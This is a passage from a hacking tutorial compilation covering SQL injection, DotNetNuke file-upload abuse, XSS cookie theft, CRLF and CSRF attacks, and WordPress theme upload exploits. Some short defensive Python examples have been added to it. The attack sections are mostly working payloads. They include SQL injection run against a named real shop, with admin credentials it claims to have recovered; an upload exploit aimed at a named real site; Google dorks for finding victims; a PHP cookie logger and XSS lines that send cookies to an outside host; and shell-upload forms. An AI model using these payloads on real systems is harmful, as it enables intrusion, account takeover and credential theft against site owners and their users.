http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables))

We want the admin table, so we exclude the first name found and ask again:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables where table_name not in
('Tab_FinalOrder')))

The admin table is called AdminMaster.

4) Finding columns in admin table

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name =
'AdminMaster'))

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name = 'AdminMaster'
and column_name not in ('Admin_name')))

Column names (from the two errors): Admin_name, Admin_password

5) Finding username and password
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_name from AdminMaster))


Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_password from AdminMaster))


Code:
Username: admin
Password: pothys!@#

Dot net nuke :


DNN (DotNetNuke) ships a link gallery page for its FCK editor through which files can be uploaded to the
site and kept like an "online gallery". That page has a hole: it lets anyone upload files with
extensions such as *.gif, *.jpg, *.pdf, *.txt, *.swf.

Google dork to find vulnerable sites:
Code:
inurl:fck/fcklinkgallery.aspx

I'm going to use this site:
Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx

If the page loads, it looks like this:

(screenshot)

which means we can continue. Now we choose option 3 -> File (A File On Your Site) and run this
JavaScript in the address bar to reveal the upload control:
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

A Choose File control and an Upload Selected File button will show up.

*on this site the text colour matches the background, so select the whole page (CTRL+A) to see the
upload button.

(screenshot)

Upload the file and access it at sitelink.com/portals/0/filename.extension
->
Code:
http://kellyballancephotography.com/portals/0/config.txt

XSS :


1) XSS?

XSS (Cross-Site Scripting) lets an attacker execute JavaScript in other users' browsers in the context
of the vulnerable site.
XSS can be used in many ways: simply running JavaScript commands, or stealing cookies. With a stolen
session cookie injected into our own browser we can log in somewhere without the password.

2) Required stuff

Mozilla Firefox:
Code:
http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB

Add-on Firebug:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firebug/

Add-on FireCookie:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/

Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi

Basic knowledge of JavaScript is recommended.

3) Testing XSS vulnerability

Sites where this method applies are those with a text input and submit button, and those where a GET
parameter is printed back into the page.
Example of the GET method:
Code:
www.site.com/index.php?page=<script>alert("XSS")</script>

The command to check for the vulnerability is:
Code:
<script>alert("XSS")</script>

What this command does:
<script> - opening script tag
alert("XSS") - a window pops up saying "XSS"
</script> - closing script tag

4) XSS types

Cookie Stealing - we steal the cookies of some user (commonly the admin) and put the cookie in our own
browser, so when we open the site we are already logged in.
Cross-Site Request Forgery - we make the victim's browser send requests (and thus commands) on our
behalf without knowing their credentials.
XSS Worms - an "evil" script that is able to spread itself across the whole site.
Door-Forwarding - the script creates an iframe that exploits something or starts a download of a
virus, RAT, keylogger, stealer, etc.
Keylogging - you know what keylogging is.

5) Cookie Stealing

For cookie stealing we need:
-a vulnerable site
-web hosting for the script
-a PHP script

Put this script on some hosting:

cookie.php
Code:
<?php
// Append whatever arrives in ?cookie= to a log file.
// ($HTTP_GET_VARS, used in the original, was removed in PHP 5.4; $_GET is the replacement.)
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n");
fclose($file);
?>

Script execution (any of these sends the victim's browser to the logger with its cookies appended):
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie);</script>
or
<script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>

How does this work?

When a user opens the page carrying your cookie logger, their cookie is saved to the log. We then take
that cookie and use it ourselves. Here is how:

1) Open Mozilla Firefox
2) Open the Firebug add-on (the FireCookie add-on adds the cookie editor)

(screenshot)

3) Enter the cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898
In this cookie the name is PHPSESSID
and the value is db3e4e100ab6bb912de1b80c4eed7898

Cookies flagged HttpOnly are not readable through document.cookie, so this only works when the session
cookie lacks that flag.

6) Filter bypassing

1) Deleting the script tag
E.g. if we type <script>alert("XSS")</script> and the page only prints alert("XSS"), the script is
deleting the <script> and </script> tags.
Here is how to bypass that protection: instead of <script>alert("XSS")</script> we send
<scr<script>ipt>alert("XSS")</scr</script>ipt>
After the filter removes the inner tags once, what is left is exactly <script>alert("XSS")</script>.

2) magic_quotes
Explained here:
Code:
http://en.wikipedia.org/wiki/Magic_quotes

If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script>, then it is
magic_quotes protection (every ' and " gets a backslash in front of it).
It is a bit harder to bypass magic_quotes. The trick is String.fromCharCode, which builds a string from
numeric character codes, so no quote characters are needed at all.
Example:
The link of our cookie logger is http://link.com/cookie.php, and we would use
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
which becomes:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie;</scr</script>ipt>

This works because magic_quotes only escapes ' and ", and the integers passed to String.fromCharCode
need neither.

The decimal codes for http://www.link.com/cookie.php?cookie= were produced with this tool:
Code:
Ascii to Decimal
http://pookey.co.uk/binary.php

7) Bypass XSS Filters
[1] Types of filters:

[+]Bypass magic_quotes_gpc (if it's on)
[+]Bypass with full URL encoding
[+]Bypass with obfuscation
[+]Bypass with the break-out method

[+]Bypass magic_quotes_gpc

When magic_quotes_gpc is on, the server escapes ", ' and \ (and NUL) with a backslash before your input
reaches the script, so quoted strings in your payload break.

To bypass it we use:
String.fromCharCode()
We write our string inside the () as ASCII codes.
Example:
String.fromCharCode(107, 51, 110, 122, 48)
(Here I encoded k3nz0 in ASCII: 107, 51, 110, 122, 48.)
And we use it:
<script>alert(String.fromCharCode(107, 51, 110, 122, 48))</script>
We will see: k3nz0
(The call by itself only evaluates to the string; it has to be passed to something such as alert() or
document.write() to become visible.)
We bypassed magic_quotes_gpc :)

[+] Bypass with full URL encoding:

Very simple, we encode every character of our code as %XX (URL encoding)!
Our code: <script>alert('i am here')</script>
And fully URL-encoded:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E

Now you can inject it :) !
Note that you can use the tool "Coder" to do the encoding.
This gets past filters that inspect the raw, still-encoded request; the web server decodes it before
the application sees it.

[+] Bypass with obfuscation:

Very simple too: this filter blocks, for example, these words:
-script
-alert

To bypass it, change "script" to, for example, "sCriPt" and "alert" to "ALerT"!
For example:
<ScriPt>ALeRt("i am here")</scriPt>
We bypassed the filter. (HTML tag names are case-insensitive, so <ScriPt> works; JavaScript identifiers
are not, so ALeRt(...) itself will not run. Mixed case only helps on the tag name; if the word alert is
filtered too, build it from character codes or use another function.)

[+] Bypass with the break-out method:

Generally used in search scripts, where the input is reflected inside an attribute value: we put "> at
the beginning to close the current attribute and tag, and our script follows. Example:
http://target.com/search.php?search="><script>alert("hello")</script>
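
An added example (not from the original tutorial) that runs the bypasses from sections 6 and 7 against
three defences: the tutorial's tag-deleting filter, a case-insensitive variant of it, and output encoding
with html.escape, which is the actual fix. The payloads are constructed from the tutorial's own strings;
percent_encode_all and to_fromcharcode reproduce the two encodings used above so the listed values can
be checked. Python is used for the whole page; the filters model server-side logic, and
reaches_browser_as_script stands in for the browser by looking for an opening <script tag in what the
server would emit.

```python
import html
import re
import urllib.parse

# Constructed payloads, taken from the bypass techniques the tutorial lists.
PAYLOADS = {
    "plain":      '<script>alert("XSS")</script>',
    "nested":     '<scr<script>ipt>alert("XSS")</scr</script>ipt>',
    "mixed_case": '<ScriPt>ALeRt("i am here")</scriPt>',
}

def naive_strip_script(s: str) -> str:
    """The tutorial's 'deleting script tag' filter: <script> and </script>
    are removed, case-sensitively, in one pass."""
    return s.replace("<script>", "").replace("</script>", "")

def strip_script_ci(s: str) -> str:
    """A slightly better blacklist: case-insensitive, still a single pass."""
    return re.sub(r"</?script>", "", s, flags=re.IGNORECASE)

def escape_for_html(s: str) -> str:
    """The fix: output encoding for an HTML text or attribute context.
    Nothing the user typed can open a tag or close an attribute."""
    return html.escape(s, quote=True)

def reaches_browser_as_script(rendered: str) -> bool:
    """True when the string the server emits still contains an opening
    <script tag the browser would execute."""
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None

def survival_matrix() -> dict:
    """For each payload: does a <script> tag survive each defence?"""
    matrix = {}
    for name, payload in PAYLOADS.items():
        matrix[name] = {
            "naive": reaches_browser_as_script(naive_strip_script(payload)),
            "case_insensitive": reaches_browser_as_script(strip_script_ci(payload)),
            "escaped": reaches_browser_as_script(escape_for_html(payload)),
        }
    return matrix

def percent_encode_all(s: str) -> str:
    """The tutorial's 'full' encoding: every byte as %XX.  A filter that
    inspects the raw query string sees no '<' at all."""
    return "".join(f"%{b:02X}" for b in s.encode())

def raw_filter_then_decode(s: str) -> str:
    """A filter run on the raw, still-encoded parameter, followed by the
    decoding the web stack performs anyway before the page uses the value."""
    return urllib.parse.unquote(naive_strip_script(s))

def to_fromcharcode(s: str) -> str:
    """magic_quotes bypass: express a string as String.fromCharCode(...),
    which needs no quote characters in the page at all."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in s) + ")"

if __name__ == "__main__":
    for name, row in survival_matrix().items():
        print(name, row)
    print(percent_encode_all("<script>alert('i am here')</script>"))
    print(to_fromcharcode("http://www.link.com/cookie.php?cookie="))
```

The matrix is the point: the nested payload gets through both blacklists because removing the inner tag
creates a new one, mixed case only defeats the case-sensitive filter, and escaping stops every variant
because it never tries to recognise the attack, it just makes < and " inert. Decoding after filtering
(raw_filter_then_decode) is the ordering mistake the URL-encoding bypass exploits.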

8) XSSER Framework

Download : http://sourceforge.net/projects/xsser/
Usage
xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface

*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded

*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:
-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls

--De=DORK_ENGINE
Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler, ask, etc.
See dork.py file to check for available engines)

*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.
-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)

*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:
--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)

--retries=RETRIES Retries when the connection timeouts (default 3)

*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:
--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file

*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on
target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:
--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem Try -manually- different Character Encoding mutations (reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
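
The bypassers above all produce the same payload in a different surface form, which is exactly what defeats a filter or log rule written against the plain text. The defensive counterpart is to canonicalize before matching. The following is an added example, not part of XSSer or of the original slides: it undoes URL encoding, decimal and hex numeric references (with or without semicolons), and DWORD, hex and octal host obfuscation, then matches a small constructed signature list. The signature list and the sample inputs are assumptions for the demonstration, not a production ruleset.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Numeric character references in decimal (&#106;) or hex (&#x6a;), with or
# without the trailing semicolon (the --Dec, --Hex and --Hes forms above).
_NUMERIC_REF = re.compile(r"&#([xX][0-9a-fA-F]+|[0-9]+);?")
# Scheme plus host of an absolute URL; the host is what --Dwo / --Doo rewrite.
_URL_HOST = re.compile(r"(?i)(https?://)([^/\s'\"<>]+)")


def decode_numeric_refs(text: str) -> str:
    """Replace numeric character references with the characters they denote."""
    def repl(m: "re.Match[str]") -> str:
        body = m.group(1)
        code = int(body[1:], 16) if body[0] in "xX" else int(body, 10)
        return chr(code) if code < 0x110000 else m.group(0)
    return _NUMERIC_REF.sub(repl, text)


def canonical_ip(host: str) -> Optional[str]:
    """Turn a DWORD (3232235777), hex (0xC0A80101) or zero-padded octal
    (0300.0250.01.01) host into dotted-decimal; None if host is none of these."""
    if re.fullmatch(r"[0-9]+", host):
        n = int(host, 10)
    elif re.fullmatch(r"0[xX][0-9a-fA-F]+", host):
        n = int(host, 16)
    elif re.fullmatch(r"0[0-7]*(\.0[0-7]*){3}", host):
        octets = [int(p, 8) for p in host.split(".")]
        return ".".join(map(str, octets)) if max(octets) <= 255 else None
    else:
        return None
    if n > 0xFFFFFFFF:
        return None
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonicalize(payload: str) -> str:
    """Undo URL encoding, numeric references and host obfuscation so that a
    signature written for the plain form also matches the obfuscated one."""
    text = decode_numeric_refs(unquote(payload))

    def fix_host(m: "re.Match[str]") -> str:
        return m.group(1) + (canonical_ip(m.group(2)) or m.group(2))
    return _URL_HOST.sub(fix_host, text)


# Constructed signature list for the demonstration, not a production ruleset.
SIGNATURES = ("<script", "javascript:", "onerror=", "onmousemove=")


def matching_signatures(payload: str) -> List[str]:
    """Signatures that match the canonical form of the payload."""
    canon = canonicalize(payload).lower()
    return [sig for sig in SIGNATURES if sig in canon]


if __name__ == "__main__":
    for sample in ("&#60;script&#62;", "&#x6a&#x61&#x76&#x61script:", "http://3232235777/"):
        print(repr(sample), "->", repr(canonicalize(sample)), matching_signatures(sample))
```

The point of the decoder is not to block the listed strings (a real rule set is far larger) but to make sure every rule sees one representation; the same canonicalizer belongs in front of log search as well, since the obfuscated request is what lands in the access log.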

*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select
multiple:

--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)

*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want
to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:
--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select
multiple and combine with your final code (except with DCP code):
--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code

*Miscellaneous*:

--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered


Example :

* Simple injection from URL:

$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads
character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first,
change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third,
reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to
"20" and using multithreads (5 threads):

$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character
encoding to bypass filters:

$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
-------------------

* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:

$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP
Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM
shadow space (no server logging!) and if exists any "hole", applying your manual final payload
"malicious" code (ready for real attacks!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link
(is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic
payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between
petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie
parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and
creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to
be uploaded.

$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca (federated XSS pentesting botnet):

$ python xsser.py -d "login.php" --De "duck" --publish

-------------------
* Create a .swf movie with XSS code injected

$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results

$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed
in a shortered link, on positive results founded. XSS real-time exploiting.

$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.

$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser
directly

$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

CRLF :


1) CRLF?

Short for Carriage Return and Line Feed. CRLF injection is very easy to use: it amounts to adding a
new line (\n) into the output.

2) Vulnerable places

Vulnerable places can be anywhere. In this tutorial I'm going to use a chat as the example.

3) Exploiting vulnerability and protection

Let's say that when you send a message, the chat looks like this:
Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead... \n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php

If the chat is vulnerable, it will look like this:
Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php

We wrote the second message as Admin; users will think that the Admin actually sent it and will log
in to the site we gave them. With that login page we are going to keylog the site logins.


4) Vulnerable script

e.g.
Code:
<?php
if (isset($_POST['send_message'])) {
    if (!empty($_POST['message'])) {
        // htmlspecialchars() neutralises HTML metacharacters but leaves carriage
        // returns and line feeds untouched, so the message can still break into
        // a new chat line.
        $message = htmlspecialchars($_POST['message']);
        // rest of the code to send the message
    }
}
?>
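
The script above escapes HTML but never touches the newline, which is the whole vulnerability. The following is an added example, not the page's own code, showing the fix in Python: line breaks are collapsed and other control characters dropped before HTML escaping, so a message can never start a second chat line. It assumes the submitted message contains a real newline character (the \n in the chat transcript above) and that chat lines are rendered as "timestamp - user: message"; the FORGED sample is constructed from the transcript.

```python
import html
import re
from typing import List

# Characters that start a new line in most log, chat and header contexts:
# CR, LF, vertical tab, form feed, NEL and the Unicode line/paragraph separators.
_LINE_BREAKS = re.compile(r"[\r\n\x0b\x0c\x85\u2028\u2029]")
# Remaining C0 control characters and DEL.
_OTHER_CONTROLS = re.compile(r"[\x00-\x08\x0e-\x1f\x7f]")


def escape_only(raw: str) -> str:
    """What the vulnerable script does: HTML-escape and nothing else."""
    return html.escape(raw, quote=True)


def sanitize_message(raw: str, max_len: int = 500) -> str:
    """Collapse line breaks to a space, drop other control characters, cap the
    length, then HTML-escape. Order matters: escaping first would leave the
    newline untouched, exactly as in the vulnerable script."""
    text = _LINE_BREAKS.sub(" ", raw)
    text = _OTHER_CONTROLS.sub("", text)
    return html.escape(text[:max_len], quote=True)


def render_chat_line(timestamp: str, user: str, message: str) -> str:
    """Build one chat line; the user name is sanitized too, since it is also
    chosen by the sender at registration time."""
    return f"{timestamp} - {sanitize_message(user, 32)}: {sanitize_message(message)}"


def render_log(entries: List[tuple]) -> List[str]:
    """Render (timestamp, user, message) tuples to chat lines, one per entry."""
    return [render_chat_line(*entry) for entry in entries]


# Constructed message reproducing the forged "Admin" line from the transcript.
FORGED = ("Ok go ahead... \n1.4.2012 10:30 - Admin: You are right saiR login "
          "database is deleted. Log in here till I get it back: "
          "http://vulnerablesite.com/login.php")

if __name__ == "__main__":
    print(escape_only(FORGED))                                  # still two lines
    print(render_chat_line("1.4.2012 10:30", "saiR", FORGED))  # one line
```

The same rule applies wherever user input is written into a line-oriented sink (HTTP headers, syslog, mail headers): strip or reject CR and LF at the boundary, rather than hoping the HTML escaper covers it.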

CSRF :


1) CSRF?

Short for Cross Site Request Forgery. CSRF is a mix of XSS and LFI. It is used to execute
something without knowing the username.

2) Vulnerable places

It can be used when the site is using the GET method. If CSRF is done successfully, the attacker can change
the password of some user. The most common vulnerable places are avatars.

3) Exploiting vulnerability

Let's say we have a profile link:
Code:
http://www.link.com/profile.php

Where you can see user data (username, avatar, email...).
Now suppose the user wants to edit his profile using e.g.
Code:
http://www.link.com/edit_profile.php

Now, instead of an avatar link, we are going to add the profile-editing link together with the new
value, using the GET method.

NOTE: The profile editing has to use the GET method, otherwise we won't be able to attack.

Add as avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpassword

password is the name of the input (it can be different; it's best to check the source code)

Now when we look at the avatar we won't see a picture (as if there were none). When another
user views your avatar, if the attack was successful, his password will be changed to the one we put.
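
The avatar trick works because the edit_profile.php endpoint accepts a state change over GET with nothing but the victim's session cookie attached. The following is an added example, not code from the page: a minimal CsrfGuard that mints a per-session HMAC token and a hardened edit-profile handler that refuses GET and refuses any POST whose token was not minted for the caller's session. The session id, secret key and parameter names are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Tuple


class CsrfGuard:
    """Issues and checks per-session anti-CSRF tokens of the form
    nonce.HMAC_SHA256(secret, session_id:nonce)."""

    def __init__(self, secret: bytes) -> None:
        self._secret = secret

    def _mac(self, session_id: str, nonce: str) -> str:
        msg = f"{session_id}:{nonce}".encode()
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()

    def token_for(self, session_id: str) -> str:
        """Token to embed as a hidden field in the edit-profile form."""
        nonce = secrets.token_hex(16)
        return f"{nonce}.{self._mac(session_id, nonce)}"

    def verify(self, session_id: str, token: str) -> bool:
        """True only if the token was minted for this session; constant-time compare."""
        if not isinstance(token, str) or "." not in token:
            return False
        nonce, mac = token.split(".", 1)
        return hmac.compare_digest(mac, self._mac(session_id, nonce))


def handle_edit_profile(guard: CsrfGuard, method: str, session_id: str,
                        params: Dict[str, str]) -> Tuple[int, str]:
    """Hardened edit_profile.php: state changes need POST and a valid token."""
    if method != "POST":
        # An <img src="...edit_profile.php?password=..."> can only ever send GET.
        return 405, "state-changing request must use POST"
    if not guard.verify(session_id, params.get("csrf_token", "")):
        # A cross-site form post carries the victim's cookie but not the token.
        return 403, "missing or invalid CSRF token"
    if not params.get("password"):
        return 400, "no changes supplied"
    return 200, "password changed"


if __name__ == "__main__":
    guard = CsrfGuard(secrets.token_bytes(32))   # constructed key; keep it server-side
    sid = "session-abc"
    print(handle_edit_profile(guard, "GET", sid, {"password": "newpassword"}))
    print(handle_edit_profile(guard, "POST", sid, {"password": "newpassword"}))
    print(handle_edit_profile(guard, "POST", sid,
                              {"password": "newpassword",
                               "csrf_token": guard.token_for(sid)}))
```

Requiring POST alone is not enough (a hidden auto-submitting form posts just as easily as an image tag fetches), which is why the token check is the real control; rejecting GET simply removes the zero-interaction avatar variant described above.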

4) Examples of CSRF File Upload Vulnerabilities

1. Wordpress Amplus Themes CSRF File Upload Vulnerability
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability
4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability

1. Wordpress Amplus Themes CSRF File Upload Vulnerability

Dork :

inurl:wp-content/themes/amplus

Exploit & POC :

http://site-target/wp-content/themes/amplus/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File Access :

http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

2. Wordpress Dimension Themes CSRF File Upload Vulnerability

Dork :
inurl:wp-content/themes/dimension

Exploit & POC :
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

3. Wordpress Euclid Themes CSRF File Upload Vulnerability

Dork :

inurl:wp-content/themes/euclid_v1

Exploit & POC :

http://site-target/wp-content/themes/euclid/functions/upload-handler.php
http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>


File Access :

http://site-target/uploads/[years]/[month]/your_shell.php

Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

4. Wordpress theCotton Themes CSRF File Upload Vulnerability

Dork :

inurl:wp-content/themes/thecotton_v114/

Exploit & POC :

http://site/[patch]/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/make_a_statement/library/includes/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

Server Side Includes | Server Side Inclusion :


1) Introduction to Server Side Includes

